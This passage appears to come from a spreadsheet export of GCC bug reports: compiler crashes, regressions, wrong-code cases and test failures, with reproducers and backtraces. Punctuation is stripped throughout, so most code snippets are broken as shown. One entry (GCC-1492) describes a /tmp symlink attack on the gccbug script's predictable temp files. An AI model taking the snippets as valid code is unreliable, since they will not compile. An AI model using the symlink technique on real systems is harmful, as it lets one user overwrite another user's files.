        ../../gcc-source-trunk/gcc/rtlhooks.c:63
0x82c4a3 store_bit_field_using_insv
        ../../gcc-source-trunk/gcc/expmed.c:678
0x832cf7 store_bit_field_1
        ../../gcc-source-trunk/gcc/expmed.c:991
0x832daf store_bit_field_1
        ../../gcc-source-trunk/gcc/expmed.c:1014
0x832f6b store_bit_field(rtx_def* unsigned long unsigned long unsigned long unsigned long machine_mode rtx_def* bool)
        ../../gcc-source-trunk/gcc/expmed.c:1113
0x854758 store_field
        ../../gcc-source-trunk/gcc/expr.c:6784
0x850203 expand_assignment(tree_node* tree_node* bool)
        ../../gcc-source-trunk/gcc/expr.c:5021
0x73df5c expand_gimple_stmt_1
        ../../gcc-source-trunk/gcc/cfgexpand.c:3618
0x73df5c expand_gimple_stmt
        ../../gcc-source-trunk/gcc/cfgexpand.c:3714
0x740f43 expand_gimple_basic_block
        ../../gcc-source-trunk/gcc/cfgexpand.c:5720
0x745ff6 execute
        ../../gcc-source-trunk/gcc/cfgexpand.c:6335
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$
--------------------
struct
{ 
  int f0:4
} a
void
fn1 ()
{ 
  a.f0 = fn1
}</t>
  </si>
  <si>
    <t>GCC-70071</t>
  </si>
  <si>
    <t>ICE on wrong usage of a subscript triplet</t>
  </si>
  <si>
    <t>A wrong usage of a subscript triplet :
$ cat z1.f90
program p
   integer allocatable :: z(:)[::]
   allocate (z(2)[1::2*])
end
$ gfortran-6 -fcoarray=single z1.f90
f951: internal compiler error: gfc_ref_dimen_size(): Bad dimension
$ cat z2.f90
program p
   integer allocatable :: z(:)[::]
   allocate (z(2)[1:3:2*])
end
$ gfortran-6 -fcoarray=single z2.f90
f951: internal compiler error: gfc_ref_dimen_size(): Bad dimension</t>
  </si>
  <si>
    <t>GCC-71147</t>
  </si>
  <si>
    <t>[6 Regression] Flexible array member wrongly rejected in template</t>
  </si>
  <si>
    <t>Created attachment 38497
Reproducer
gcc (GCC) 6.1.1 20160510 (Red Hat 6.1.1-2)
The attached code does not compile under g++ 6.  It works fine under 5.3 (with -std=gnu++14).
Removing template  or converting the array to be an array of unsigned (instead of array of struct) hides the problem.</t>
  </si>
  <si>
    <t>GCC-6332</t>
  </si>
  <si>
    <t>g++ always crashes with an internal error on a certain file</t>
  </si>
  <si>
    <t>Compiler stops compiling with internal compiler error
Release:
Reading specs from /usr/lib/gcc-lib/i486-suse-linux/2.95.3/specs gcc version 2.95.3 20010315 (SuSE)
Environment:
SuSE Linux 7.2 with special changes: QT is version 3.0.3 KDE is version 3.0 stable (Pentium4 processor)
How-To-Repeat:
Compile attached file NO SPECIAL OPTIONS NEEDED it crashes even without any options: g++ -c example.ii</t>
  </si>
  <si>
    <t>roemer</t>
  </si>
  <si>
    <t>GCC-29921</t>
  </si>
  <si>
    <t>[4.3 regression]: internal compiler error: in set_lattice_value at tree-ssa-ccp.c:437</t>
  </si>
  <si>
    <t>With gcc version 4.3.0 20061120 (experimental) [trunk revision 119024]
on Linux/x86 and Linux/x86-64 I got
[hjl@gnu-68 build_base_o2.0000]$ cat foo.f
      SUBROUTINE foo
      IMPLICIT DOUBLE PRECISION (A-HO-Z)
      LOGICAL MASWRK
      COMMON /FRAME / W1W2W3
      COMMON /FRAMES/ X1Y1Z1X2Y2Z2X3Y3Z3
      PARAMETER (ZERO=0.0D+00 ONE=1.0D+00)
      IF (IGROUP .EQ. 1) GO TO 600
      IF (IGROUP .EQ. 2) GO TO 620
  600 NT = 1
  620 CONTINUE
      IF (RHO .GT. TOL) THEN
         Y3 = RFIND('Y3      'IERR)
            IF(IERR.NE.0) CALL ABRT
         Z3 = RFIND('Z3      'IERR)
            IF(IERR.NE.0) CALL ABRT
         IF (MASWRK) WRITE (IP9048) X3Y3Z3
      ELSE
         X1 = ZERO
         Y1 = ZERO
         Z1 = ZERO
         Z3 = ZERO
         X2 = ONE
         Y3 = ONE
      END IF
      W2 = (Z2-Z1)*(X3-X1)-(Z3-Z1)*(X2-X1)
 9048 FORMAT(9F10.5)
      END
[hjl@gnu-68 build_base_o2.0000]$ /usr/gcc-4.3/bin/gfortran -S -O2 foo.f -ffast-math
foo.f: In function â€˜fooâ€™:
foo.f:1: internal compiler error: in set_lattice_value at tree-ssa-ccp.c:437
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
[hjl@gnu-68 build_base_o2.0000]$</t>
  </si>
  <si>
    <t>GCC-56768</t>
  </si>
  <si>
    <t>[4.7] ICE in make_decl_rtl at varasm.c:1147</t>
  </si>
  <si>
    <t>Google ref b/8485258
Does *not* reproduce on trunk
Does reproduce using gcc-4_7 (r197167)
Test case:
struct Iter
{
  int
  void operator++ ()
}
bool operator!= (Iter 
struct Container
{
  Iter begin () const
  Iter end () const
}
struct J
{
    virtual J *mutable_child ()
}
struct M
{
    M (const Container 
    J ns_
}
namespace
{
  J MakeNamespace (const Container &amp;src)
  {
    J a
    J *b = 0
    for (const int &amp;c: src)
      b = b ? b-&gt;mutable_child () : 
    return a
  }
}
M::M (const Container &amp;ns):ns_ (MakeNamespace (ns))
{
}
cc1plus pp.ii -std=c++11 -quiet &amp;&amp; echo ok
ok
cc1plus pp.ii -std=c++11 -quiet -O2
pp.ii: In constructor â€˜M::M(const Container&amp;)â€™:
pp.ii:36:1: internal compiler error: in make_decl_rtl at varasm.c:1147
Please submit a full bug report</t>
  </si>
  <si>
    <t>GCC-1492</t>
  </si>
  <si>
    <t>gccbug security</t>
  </si>
  <si>
    <t>The gccbug script handles temporary files insecurely: it uses
predictable names (depending only on the pid) in /tmp if TMPDIR is
not set and will follow symlinks when overwriting them.
Release:
2.97 20001221 (experimental)
Environment:
System: Linux decomino 2.2.18 #1 Thu Dec 14 19:30:45 UTC 2000 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc-cvs/configure --prefix=/opt/gcc/snapshot --disable-shared --enable-threads=posix --with-system-zlib
How-To-Repeat:
Standard /tmp exploits: as a hostile user create symlinks named after
possible pids pointing to files writable by a user who runs gccbug.</t>
  </si>
  <si>
    <t>CLASSPATH-26947</t>
  </si>
  <si>
    <t>JInternalFrame: double-click on title bar should maximize/minimize the frame</t>
  </si>
  <si>
    <t>Depending on the state of a JInternalFrame it should be maximized or minimized by double-clicking on its title bar. This does not work currently.</t>
  </si>
  <si>
    <t>GCC-60064</t>
  </si>
  <si>
    <t>[c++1y] ICE with auto as parameter of friend function</t>
  </si>
  <si>
    <t>The following valid code snippet (compiled with -std=c++1y) triggers an ICE on trunk:
===========================================
struct A
{
  friend void foo(auto) {}
}
===========================================
bug.cc:4:1: internal compiler error: in poplevel_class at cp/name-lookup.c:2951
 }
 ^
0x77ff17 poplevel_class()
        ../../gcc/gcc/cp/name-lookup.c:2951
0x665008 popclass()
        ../../gcc/gcc/cp/class.c:7127
0x679edd finish_struct(tree_node* tree_node*)
        ../../gcc/gcc/cp/class.c:6808
0x6ac14a cp_parser_class_specifier_1
        ../../gcc/gcc/cp/parser.c:19218
0x6ac14a cp_parser_class_specifier
        ../../gcc/gcc/cp/parser.c:19437
0x6ac14a cp_parser_type_specifier
        ../../gcc/gcc/cp/parser.c:14302
0x6c5540 cp_parser_decl_specifier_seq
        ../../gcc/gcc/cp/parser.c:11547
0x6cc139 cp_parser_simple_declaration
        ../../gcc/gcc/cp/parser.c:11137
0x6af5f3 cp_parser_block_declaration
        ../../gcc/gcc/cp/parser.c:11086
0x6d68f2 cp_parser_declaration
        ../../gcc/gcc/cp/parser.c:10983
0x6d55e8 cp_parser_declaration_seq_opt
        ../../gcc/gcc/cp/parser.c:10869
0x6d6eca cp_parser_translation_unit
        ../../gcc/gcc/cp/parser.c:4014
0x6d6eca c_parse_file()
        ../../gcc/gcc/cp/parser.c:31528
0x7f6973 c_common_parse_file()
        ../../gcc/gcc/c-family/c-opts.c:1060
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-78413</t>
  </si>
  <si>
    <t>[7 Regression] ICE in single_pred_edge at basic-block.h:361</t>
  </si>
  <si>
    <t>markus@x4 /tmp % cat test.i
extern long long int llrint(double x)
int a
double b
__attribute__((cold)) void decode_init() {
  int c d = 0
  for ( d &lt; 12 d++) {
    if (d)
      b = 0
    c = 0
    for ( c &lt; 6 c++)
      a = b ? llrint(b) : 0
  }
}
markus@x4 /tmp % gcc -O3 -ffast-math -c test.i
test.i: In function â€˜decode_initâ€™:
test.i:4:28: internal compiler error: in single_pred_edge at basic-block.h:361
 __attribute__((cold)) void decode_init() {
                            ^~~~~~~~~~~
0x5a4ea1 single_pred_edge
        ../../gcc/gcc/basic-block.h:361
0xbed2bf single_pred
        ../../gcc/gcc/basic-block.h:380
0xbed2bf versionable_outer_loop_p
        ../../gcc/gcc/tree-if-conv.c:2592
0xbed2bf tree_if_conversion(loop*)
        ../../gcc/gcc/tree-if-conv.c:2813
0xbed611 execute
        ../../gcc/gcc/tree-if-conv.c:2893</t>
  </si>
  <si>
    <t>GCC-35899</t>
  </si>
  <si>
    <t>[4.3/4.4 Regression] ICE on filesystem code</t>
  </si>
  <si>
    <t>I get an ICE on some filesystem code I'm developing when trying to compile it with GCC 4.3.0.
megari@yukino:~/gcc-bug$ gcc-4.3 -v -save-temps -o sfs_unittests.o  -O2 -g -I. -std=c99 -Wall -W -c sfs_unittests.c 
Using built-in specs.
Target: i486-linux-gnu
Configured with: ../src/configure linux gnu
Thread model: posix
gcc version 4.3.1 20080401 (prerelease) (Debian 4.3.0-3) 
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-o' 'sfs_unittests.o' '-O2' '-g' '-I.' '-std=c99' '-Wall' '-W' '-c' '-mtune=generic'
 /usr/lib/gcc/i486-linux-gnu/4.3.1/cc1 -E -quiet -v -I. sfs_unittests.c -mtune=generic -std=c99 -Wall -W -fworking-directory -O2 -fpch-preprocess -o sfs_unittests.i
ignoring nonexistent directory /usr/local/include/i486-linux-gnu
ignoring nonexistent directory /usr/lib/gcc/i486-linux-gnu/4.3.1/../../../../i486-linux-gnu/include
ignoring nonexistent directory /usr/include/i486-linux-gnu
#include ... search starts here:
#include  search starts here:
 .
 /usr/local/include
 /usr/lib/gcc/i486-linux-gnu/4.3.1/include
 /usr/lib/gcc/i486-linux-gnu/4.3.1/include-fixed
 /usr/include
End of search list.
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-o' 'sfs_unittests.o' '-O2' '-g' '-I.' '-std=c99' '-Wall' '-W' '-c' '-mtune=generic'
 /usr/lib/gcc/i486-linux-gnu/4.3.1/cc1 -fpreprocessed sfs_unittests.i -quiet -dumpbase sfs_unittests.c -mtune=generic -auxbase-strip sfs_unittests.o -g -O2 -Wall -W -std=c99 -version -o sfs_unittests.s
GNU C (Debian 4.3.0-3) version 4.3.1 20080401 (prerelease) (i486-linux-gnu)
        compiled by GNU C version 4.3.1 20080401 (prerelease) GMP version 4.2.2 MPFR version 2.3.1.
warning: GMP header version 4.2.2 differs from library version 4.2.1.
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: c8e3951360ed7273beac0a50e7fd5f3d
In file included from sfs_unittests.c:4:
fs/sfs_xplatform.h: In function â€˜sfs_write_fileâ€™:
fs/sfs_xplatform.h:130: warning: implicit declaration of function â€˜sfs_native_write_blockâ€™
fs/sfs_xplatform.h:148: warning: implicit declaration of function â€˜sfs_native_read_blockâ€™
sfs_unittests.c: At top level:
sfs_unittests.c:5: warning: conflicting types for â€˜sfs_native_write_blockâ€™
fs/sfs_xplatform.h:130: warning: previous implicit declaration of â€˜sfs_native_write_blockâ€™ was here
sfs_unittests.c:11: warning: conflicting types for â€˜sfs_native_read_blockâ€™
fs/sfs_xplatform.h:148: warning: previous implicit declaration of â€˜sfs_native_read_blockâ€™ was here
sfs_unittests.c: In function â€˜printblâ€™:
sfs_unittests.c:18: warning: implicit declaration of function â€˜printfâ€™
sfs_unittests.c:18: warning: incompatible implicit declaration of built-in function â€˜printfâ€™
sfs_unittests.c: In function â€˜mainâ€™:
sfs_unittests.c:64: warning: incompatible implicit declaration of built-in function â€˜printfâ€™
fs/sfs_xplatform.h: In function â€˜sfs_remove_bytesâ€™:
fs/sfs_xplatform.h:250: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
megari@yukino:~/gcc-bug$</t>
  </si>
  <si>
    <t>megari</t>
  </si>
  <si>
    <t>GCC-45159</t>
  </si>
  <si>
    <t>Unnecessary temporaries</t>
  </si>
  <si>
    <t>Using today's trunk with http://gcc.gnu.org/ml/fortran/2010-08/msg00003.html applied.
The following example were extracted from FLEUR (www.flapw.de) where -Warray-temporaries showed that a temporary has been generated.
!-- ONE ----------------------
      subroutine t1(n1n2 gfft ufft)
        implicit none
        integer :: n1 n2 i
        real :: gfft(n1n2) ufft(n2)
        DO i=1 n1
          gfft(i:)=gfft(i:)*ufft(i)  ! No temporary needed
        END DO
      end subroutine
!-- TWO ----------------------
   we(1:noccbd) = we(n_start:n_end)
If 1 is the (known) lower bound no temporary is needed (if one copies from the lower to the upper bound). Using memmove also no temporary is needed (as it allows for this) - using memcpy this is not possible (memory needs to be disjunct). For this case of having on the RHS only a variable one should probably do a middle-end assignment with ARRAY_RANGE_REF. Cf. PR 40598.
!-- THREE ----------------------
   wannint(pw1pw2pw3:)=wannint(pw1pw2pw3:)+wannz2(j:)
gets a temporary generated (no pointer - and no target with argument aliasing involved.)</t>
  </si>
  <si>
    <t>GCC-83446</t>
  </si>
  <si>
    <t>[8 Regression] Bootstrap failed on i686</t>
  </si>
  <si>
    <t>With r255758 on i686 I got
In file included from ../../src-trunk/gcc/../libcpp/include/symtab.h:21
                 from ../../src-trunk/gcc/../libcpp/include/cpplib.h:26
                 from ../../src-trunk/gcc/c-family/c-common.h:24
                 from ../../src-trunk/gcc/cp/cp-tree.h:40
                 from ../../src-trunk/gcc/cp/mangle.c:52:
../../src-trunk/gcc/cp/mangle.c: In function â€˜void write_number(long long unsigned int int unsigned int)â€™:
../../src-trunk/gcc/../include/obstack.h:319:15: error: â€˜void* memcpy(void* const void* size_t)â€™ offset [65 63] is out of the bounds [0 64] of object â€˜bufferâ€™ with type â€˜char [64]â€™ [-Werror=array-bounds]
        memcpy (__o-&gt;next_free where __len)          \
        ~~~~~~~^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
../../src-trunk/gcc/cp/mangle.c:252:3: note: in expansion of macro â€˜obstack_growâ€™
   obstack_grow (mangle_obstack (CHAR) (LEN))
   ^~~~~~~~~~~~
../../src-trunk/gcc/cp/mangle.c:1717:3: note: in expansion of macro â€˜write_charsâ€™
   write_chars (buffer + sizeof (buffer) - count count)
   ^~~~~~~~~~~
../../src-trunk/gcc/cp/mangle.c:1708:8: note: â€˜bufferâ€™ declared here
   char buffer[sizeof (HOST_WIDE_INT) * 8]
r255753 is OK.</t>
  </si>
  <si>
    <t>GCC-561</t>
  </si>
  <si>
    <t>std:unclear about Overloaded Function Pointer resolution</t>
  </si>
  <si>
    <t>Attempting to compile the supplied program results in an
error message from GCC:
gcc -c gccBug.C
gccBug.C: In function `int main()':
gccBug.C:13: no matches converting function `foo' to type `void (A::*)()'
gccBug.C:6: candidates are: void B::foo()
gccBug.C:7:                 void B::foo(int)
Other C++ compilers accept this construct with no errors
or warnings.  Compilers tried:
   HPUX v10.0 - Unknown compiler version (Vendor supplied)
   Sun Forte v5 &amp; v6
   MS Dev Studio v5 &amp; v6
I posted this to the following web sites for feedback:
   gcc-bugs@gcc.gnu.org
   bug-gcc@gnu.org
   gcc@gcc.gnu.org
I received no helpful information except for the following:
&gt; I did some research into this as our test suite was affected by the same
&gt; problem and it appears that you're essentially correct in expecting
&gt; the code to compile (edg SunPro and VisualAge all accept it). 5.2.9
&gt; p9 allows the cast but specifies undefined behavior since the base
&gt; doesn't contain the member.
Release:
gcc version 2.95.2 19991024 (release)
Environment:
SunOS 5.7 Generic_106541-12 sun4u sparc SUNWUltra-5_10
No GCC specific environment variables set
How-To-Repeat:
class A { } 
struct B : public A
{ 
    void foo () 
    void foo (int)
} 
int main ()
{
    void (A::*f)() = (void (A::*)()) 
}</t>
  </si>
  <si>
    <t>dmies</t>
  </si>
  <si>
    <t>GCC-51924</t>
  </si>
  <si>
    <t>[4.7 regression] wrong code with -O -free -fno-rename-registers -ftree-vectorize -funroll-loops</t>
  </si>
  <si>
    <t>Created attachment 26397
reduced testcase
Output:
$ gcc -O -free -fno-rename-registers -ftree-vectorize -funroll-loops testcase.c
$ ./a.out
Aborted
In the output assembly when comparing output with -free and -fno-ree this often happens:
*************** bn_sub_words:
*** 152159 ****
        mov     QWORD PTR [rdi+rcx] r10
        cmp     r9 r8
        setb    r10b
        cmp     r9 r8
!       cmovne  rax r10
        add     rcx 8
        cmp     rcx r11
        jne     .L5
--- 156164 ----
        mov     QWORD PTR [rdi+rcx] r10
        cmp     r9 r8
        setb    r10b
+       movzx   r10d r10b
        cmp     r9 r8
!       cmovne  eax r10d
        add     rcx 8
        cmp     rcx r11
        jne     .L5
With -fno-ree (bottom) the value is extended as r10b -&gt; r10d -&gt; eax (-&gt; rax before ret)
With -free (top) the value is extended r10d -&gt; rax (where only r10b is valid - it is missing the r10b-&gt;r10d step)
Tested revisions:
r183324 - fail
4.6 - doesn't know -free but -free is included in -O2</t>
  </si>
  <si>
    <t>GCC-36314</t>
  </si>
  <si>
    <t>gfortran.dg/eoshift_large_1.f90 doesn't work</t>
  </si>
  <si>
    <t>I got
Executing on host: /export/build/gnu/gcc/build-x86_64-linux/gcc/testsuite/gfortran/../../gfortran -B/export/build/gnu/gcc/build-x86_64-linux/gcc/testsuite/gfortran/../../ /net/gnu-13/export/gnu/src/gcc/gcc/gcc/testsuite/gfortran.dg/eoshift_large_1.f90   -O0   -pedantic-errors  -L/export/build/gnu/gcc/build-x86_64-linux/x86_64-unknown-linux-gnu/./libgfortran/.libs -L/export/build/gnu/gcc/build-x86_64-linux/x86_64-unknown-linux-gnu/./libgfortran/.libs -L/export/build/gnu/gcc/build-x86_64-linux/x86_64-unknown-linux-gnu/./libiberty  -lm   -o ./eoshift_large_1.exe    (timeout = 300)
/net/gnu-13/export/gnu/src/gcc/gcc/gcc/testsuite/gfortran.dg/eoshift_large_1.f90:55.1:^M
^M
 (/3_k 3_k/)))) call abort^M
1^M
Warning: Nonconforming tab character at (1)^M
/net/gnu-13/export/gnu/src/gcc/gcc/gcc/testsuite/gfortran.dg/eoshift_large_1.f90:60.1:^M
^M
 (/3_k 3_k/)))) call abort^M
1^M
Warning: Nonconforming tab character at (1)^M</t>
  </si>
  <si>
    <t>GCC-48501</t>
  </si>
  <si>
    <t>64bit-out.go select5-out.go tmp.go compilation times out</t>
  </si>
  <si>
    <t>3 go testcases time out while compiling on Solaris 2/SPARC:
FAIL: ./64bit-out.go compilation  -O2 -g 
FAIL: ./select5-out.go compilation  -O2 -g 
FAIL: ./tmp.go compilation  -O2 -g 
E.g. compiling 64bit-out.go (an 1.3 MB source file) on an unloaded 1.35 GHz
UltraSPARC IV+ takes
real        4:13.59
user        4:12.51
sys            0.84
which is dangerously close to the default 300 s timeout.
It's way worse on a 250 MHz MIPS R10k:
real    17:17.42
user    17:12.24
sys         1.21
I thing such a test (haven't looked in more detail into the others) is way
over the top.</t>
  </si>
  <si>
    <t>GCC-56833</t>
  </si>
  <si>
    <t>[4.9 Regression] Valid register is over written by postreload pass</t>
  </si>
  <si>
    <t>AVR target built with specs:
Using built-in specs.
COLLECT_GCC=/home/vishnu.k_s/build-linux_x86_64/bldcc/gcc/xgcc
Target: avr
Configured with: ../gcc-trunk/configure --prefix=/home/vishnu.k_s/build-linux_x86_64//install --target=avr --enable-languages=cc++ --disable-nls --with-gmp=/proj/install/gmp-4.3.2/ --with-mpfr=/proj/install/mpfr-2.4.2/ --with-mpc=/proj/install/mpc-0.8.2/
Thread model: single
gcc version 4.9.0 20130326 (experimental) (GCC)
Above compiler generate wrong code for testcase present in gcc.c-torture/execute/simd-1.c.
gcc options : -O1 -mmcu=atmega1280
(snip of assembly)
ldi r30lo8(res)     r30/r31 is loaded with address of res
ldi r31hi8(res)    
st Zr24   
ldd r31Y+1             Modifying r31 register
sts res+1r31
sts res+2r27
sts res+3r26
sts res+4r23
...
lds r22res+4+2
lds r23res+4+3
ld r24Z              regsiter pair r30/r31 is used to load from res
ldd r25Z+1
ldd r26Z+2
ldd r27Z+3
(snip of assembly)
It looks like r31 is corrupted after reload pass.</t>
  </si>
  <si>
    <t>vishnu.k_s</t>
  </si>
  <si>
    <t>GCC-27733</t>
  </si>
  <si>
    <t>[4.1 Regression] Large compile time regression</t>
  </si>
  <si>
    <t>Relative to gcc version 4.0.4 20060507 (prerelease) (Debian 4.0.3-3)
gcc version 4.1.1 20060511 (prerelease) (Debian 4.1.0-4) and also my own
build of 4.2 exhibit a large increase in compile on the attached file.
On my c3k the time goes from ~ 5 seconds to 49 minutes.
The compile command used is:
/usr/bin/hppa64-linux-gnu-gcc-4.1 -nostdinc -v alloc.i -mno-space-regs -mfast-indirect-calls -mdisable-fpregs -march=2.0 -mschedule=8000 -O2 -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -Wdeclaration-after-statement -Wno-pointer-sign -fno-strict-aliasing -fno-common -fomit-frame-pointer -ffunction-sections -S</t>
  </si>
  <si>
    <t>GCC-59885</t>
  </si>
  <si>
    <t>compiler issues incorrect ambiguous base class error message</t>
  </si>
  <si>
    <t>The following code produces an error message that I believe to have swapped the 'base' and 'derived' class.
#include 
template 
class A
template 
class A {}
template 
class A : A {}
class B : public A {}
template 
void f(A *ref)
{
    std::cout &lt;&lt; f.a &lt;&lt; std::endl
}
int
main()
{
    B *b = new B
    f(b)
    return 0
}
// eof
$ g++-4.7 -std=c++0x -pedantic -Wall in.cpp -o in
in.cpp: In function â€˜int main()â€™:
in.cpp:24:8: error: no matching function for call to â€˜f(B*&amp;)â€™
in.cpp:24:8: note: candidate is:
in.cpp:15:6: note: template void f(A*)
in.cpp:15:6: note:   template argument deduction/substitution failed:
in.cpp:24:8: note:   â€˜Bâ€™ is an ambiguous base class of â€˜Aâ€™</t>
  </si>
  <si>
    <t>burrows.labs</t>
  </si>
  <si>
    <t>GCC-4938</t>
  </si>
  <si>
    <t>bad warnings about signed and unsigned</t>
  </si>
  <si>
    <t>The range of signed int is between -2147483648 and  2147483647
unsigned int between 0 and 4294967295
here a sample code:
      1 int main(void) {
      2
      3   unsigned int test
      4   int test1
      5
      6   test  = 4294967295
      7   test  = 2147483648
      8   test  = 2147483647
      9
     10   test1 = 2147483647
     11   test1 = -2147483648
     12   test1 = -2147483647
     13 }
I compile this and I have:
gcc t2.c
t2.c: In function `main':
t2.c:6: warning: decimal constant is so large that it is unsigned
t2.c:7: warning: decimal constant is so large that it is unsigned
t2.c:11: warning: decimal constant is so large that it is unsigned
I have a little difference with short I never see warnings.
signed short: -32768 to 32767
unsigned short: 0 to 65535
sample code:
      1 int main(void) {
      2
      3   unsigned short test
      4   short test1
      5
      6   test  = 65535
      7
      8   test1 = 65535
      9   test1 = 32767
     10 }
nothing about warning.  But i overflowed test1 (in line 8).
Release:
unknown
Environment:
Debian GNU/Linux GCC version 2.95 and 3.0
How-To-Repeat:
go to description</t>
  </si>
  <si>
    <t>inouk</t>
  </si>
  <si>
    <t>GCC-16140</t>
  </si>
  <si>
    <t>[4.0 Regression] Errors in libstdc++ testsuite recent CVS</t>
  </si>
  <si>
    <t>Most of the suite passes but I get errors like these:
/tmp/ccJOH1iG.o: In function `test01()':
/tmp/ccJOH1iG.o(.text._Z6test01v+0x6c): undefined reference to `typeinfo for
wchar_t'
/tmp/ccJOH1iG.o: In function `test01()':
/mnt/home3/utilities/gcc/libstdc++-v3/testsuite/27_io/fpos/14320-1.cc:43:
undefined reference to `typeinfo for short'
/mnt/home3/utilities/gcc/libstdc++-v3/testsuite/27_io/fpos/14320-1.cc:45:
undefined reference to `typeinfo for signed char'
/mnt/home3/utilities/gcc/libstdc++-v3/testsuite/27_io/fpos/14320-1.cc:45:
undefined reference to `typeinfo for signed char'
/mnt/home3/utilities/gcc/libstdc++-v3/testsuite/27_io/fpos/14320-1.cc:47:
undefined reference to `typeinfo for char'
collect2: ld returned 1 exit status
mushroom~...gcc-obj&gt;uname -a
SunOS mushroom 5.7 Generic_106541-19 sun4u sparc SUNWUltra-2
mushroom~...gcc-obj&gt;alias CONFIGURECVS
setenv CC gcc  /mnt/home3/utilities/gcc/configure --prefix=/mnt/home3/utilities
--verbose --with-as=/mnt/home3/utilities/bin/as
--with-ld=/mnt/home3/utilities/bin/ld --with-gnu-as --with-gnu-ld
--disable-multilib --enable-languages=c++ |&amp; tee clog
mushroom~...gcc-obj&gt;alias BUILD
nice gmake CFLAGS='-O' BOOT_CFLAGS='-O' LIBCFLAGS='-g -O' CXXFLAGS='-O'
LIBCXXFLAGS='-g -O -fno-implicit-templates' bootstrap |&amp; tee log
mushroom~...gcc-obj&gt;g++ -v
Reading specs from /mnt/home3/utilities/lib/gcc/sparc-sun-solaris2.7/3.5.0/specs
Configured with: /mnt/home3/utilities/gcc/configure
--prefix=/mnt/home3/utilities --verbose --with-as=/mnt/home3/utilities/bin/as
--with-ld=/mnt/home3/utilities/bin/ld --with-gnu-as --with-gnu-ld
--disable-multilib --enable-languages=c++
Thread model: posix
gcc version 3.5.0 20040621 (experimental)</t>
  </si>
  <si>
    <t>James.W.Mckelvey</t>
  </si>
  <si>
    <t>GCC-48750</t>
  </si>
  <si>
    <t>for_each_template_random_access_ed has unbalanced new/delete[]</t>
  </si>
  <si>
    <t>thread_results is allocated using scalar new yet deleted with array delete[]
Version of libs (ubuntu package): libstdc++6-4.4-dev through libstdc++6-4.6-dev
Version of compiler: g++ (Ubuntu/Linaro 4.4.4-14ubuntu5) 4.4.5
Also with: g++ (Debian 4.5.2-8) 4.5.2
Snippets:
/usr/include/c++/4.4/parallel/par_loop.h:87
#   pragma omp single
{
        num_threads = omp_get_num_threads()
        thread_results = static_cast(
                            ::operator new(num_threads * sizeof(Result)))
        constructed = new bool[num_threads]
}
but line 127:
    delete[] thread_results
This is unbalanced and leads to the expected valgrind errors. Attached is a snippet (originally from http://stackoverflow.com/questions/5769908/unexpected-segfault-with-gnu-parallelaccumulate) that will segfault.
I witnessed the segfault went away when fixing the `delete[]` into `delete`. However I think it should be evaluated whether the optimized (uninitializing) allocation of thread_results is safe to do (valgrind keeps reporting uninitialized memory references even if the attached example doesn't segfault anymore).
---- 
I'll attach the sources in 10 minutes due to time restriction and browser flakiness</t>
  </si>
  <si>
    <t>GCC-52696</t>
  </si>
  <si>
    <t>[4.6 Regression]: g++.dg/tree-ssa/pr44706.C scan-tree-dump-not fnsplit Splitting function</t>
  </si>
  <si>
    <t>This test previously passed now it fails.
A patch in the revision range (last_known_working:first_known_failing) 185724:185740
exposed or caused this regression.  Since then it fails as follows:
Running /tmp/hpautotest-gcc46/gcc/gcc/testsuite/g++.dg/dg.exp ...
...
FAIL: g++.dg/tree-ssa/pr44706.C scan-tree-dump-not fnsplit Splitting function
The message in g++.log indicates that a log-entry from an optimizaton pass is missing something didn't happen.  Maybe it's just the test-case that needs updating though that's only an uninitiated guess:
spawn /tmp/hpautotest-gcc46/cris-elf/gccobj/gcc/testsuite/g++/../../g++ -B/tmp/hpautotest-gcc46/cris-elf/gccobj/gcc/testsuite/g++/../../ /tmp/hpautotest-gcc46/gcc/gcc/testsuite/g++.dg/tree-ssa/pr44706.C -nostdinc++ -I/tmp/hpautotest-gcc46/cris-elf/gccobj/cris-elf/libstdc++-v3/include/cris-elf -I/tmp/hpautotest-gcc46/cris-elf/gccobj/cris-elf/libstdc++-v3/include -I/tmp/hpautotest-gcc46/gcc/libstdc++-v3/libsupc++ -I/tmp/hpautotest-gcc46/gcc/libstdc++-v3/include/backward -I/tmp/hpautotest-gcc46/gcc/libstdc++-v3/testsuite/util -fmessage-length=0 -O3 -fdump-tree-fnsplit -S -isystem /tmp/hpautotest-gcc46/cris-elf/gccobj/cris-elf/./newlib/targ-include -isystem /tmp/hpautotest-gcc46/gcc/newlib/libc/include -o pr44706.s
PASS: g++.dg/tree-ssa/pr44706.C (test for excess errors)
FAIL: g++.dg/tree-ssa/pr44706.C scan-tree-dump-not fnsplit Splitting function
Author of the only suspect patch in the revision range CC:ed.</t>
  </si>
  <si>
    <t>GCC-35774</t>
  </si>
  <si>
    <t>wrong code on casting int result to signed char</t>
  </si>
  <si>
    <t>In the main function there is a cast casting int result to signed char.
typedef  int  int32_T
typedef  unsigned int  uint32_T
typedef  signed char  int8_T
#include  
int main(void)
{
    int32_T i
    uint32_T numerator
    for (i = 126 i &lt; 256 i++) {
      numerator = (uint32_T)((int8_T)(-128 + i) + 128) * 63U
      fprintf(stdout i = %d numerator = %u\n i numerator) 
    }
    return numerator
}
This program is compiled with gcc -O0 -g
I suppose the result of the variable numerator should be:
126 * 63
127 * 63
128 * 63
....
But the printed result is equal to:
126 * 63
127 * 63
- 128 * 63
....
The generated assembly code on mac with Intel Core-2-Duo processor is:
        movl    -24(%ebp) %eax
        movsbl  %al%edx
        movl    %edx %eax
        sall    $6 %eax
        subl    %edx %eax
        movl    %eax -20(%ebp)
It seems both -128 and +128 are ignored.
This problem doesn't appear on gcc 4.1.1.</t>
  </si>
  <si>
    <t>hongbo.yang</t>
  </si>
  <si>
    <t>GCC-4113</t>
  </si>
  <si>
    <t>3.0.1 build dies in libstdc++-v3/include (various platforms)</t>
  </si>
  <si>
    <t xml:space="preserve">	'make bootstrap' fails in libstdc++-v3/include because
	of a file-not-found problem (see diffs below).  It
	*may* be something about my local environment but it is
